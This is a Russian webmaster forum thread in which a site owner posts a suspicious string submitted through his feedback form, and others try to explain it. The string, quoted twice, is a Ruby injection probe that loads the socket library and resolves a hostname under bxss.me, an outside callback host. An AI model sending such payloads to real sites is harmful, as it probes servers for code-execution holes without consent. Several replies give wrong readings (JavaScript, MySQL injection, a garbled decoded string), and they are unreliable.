- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем привет!
В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.
Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?
'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)
Это же JS код. Код не весь вроде как. Нет to_s, но по сути создаётся запрос к некому сайту.
Просто пытаются или куки собрать или что-то внедрить в браузер.
Я бы добавил стоп-слова в обратную связь, чтобы такие коды просто пропускались и не доходили.
Данный код напоминает фрагмент на языке программирования Ruby, в котором используется цепочка конкатенаций (сложения строк) с последующим выполнением сетевого запроса. Давайте разберем его по частям:
'A'.concat(70-3) - к строке "A" добавляется результат выражения 70-3 , что равно 67. В ASCII коде 67 соответствует символу "C", так что результатом будет "AC".
.concat(22*4) - к текущему результату "AC" добавляется результат выражения 22*4 , что равно 88. В ASCII это "X", получаем "ACX".
.concat(113) - к "ACX" добавляется символ с ASCII кодом 113, это "q", получаем "ACXq".
.concat(71).concat(108).concat(78) - далее добавляются символы с ASCII кодами 71 ("G"), 108 ("l"), и 78 ("N"), в итоге имеем строку "ACXqGlN".
+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s) - здесь код становится сложнее. Этот фрагмент загружает библиотеку socket , выполняет запрос на разрешение имени хоста, складывает полученный результат с предыдущей строкой. Скорее всего, это часть кода, используемая для сетевого взаимодействия или в качестве попытки выполнить вредоносные действия, так как bxss.me известен в контексте использования в кибератаках.
Такой код может быть использован для маскировки вредоносных действий или взаимодействия с удаленным сервером в целях получения дополнительных инструкций или отправки данных. Использование такого кода в своем проекте или при выполнении неизвестного скрипта может быть рискованным.
Сами знаете, откуда ответ)
> Данный код напоминает фрагмент на языке программирования Ruby, в котором используется цепочка конкатенаций
Если у получателя нет интерпретатора Ruby , то код не исполнится ...
Какой смысл тогда этот код отправлять в форму обратной связи на сайте?
Сами знаете, откуда ответ)
У меня чуть иначе ответил)
Сами знаете, откуда ответ)
Не знаю, подскажите!
Гигчат от сбера - завис на моем вопросе.
Формирует строку "A67881137108178".
и чем опасна эта строка ?
В чем смысл?
Не знаю, подскажите!
Чатжопити.
Всем привет!
В форму обратной связи получил любопытный код. Онлайн интерпретатор выдает ошибку. На хостинге не решил его запускать.
Прошу помочь его раскодировать, из любопытства хочется узнать, что там ?
'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(108).concat(78)+(require'socket' Socket.gethostbyname('hitod'+'glkgdinyda2b9.bxss.me.')[3].to_s)
mysql инъекция, не?
mysql инъекция, не?
А где там запрос к базе?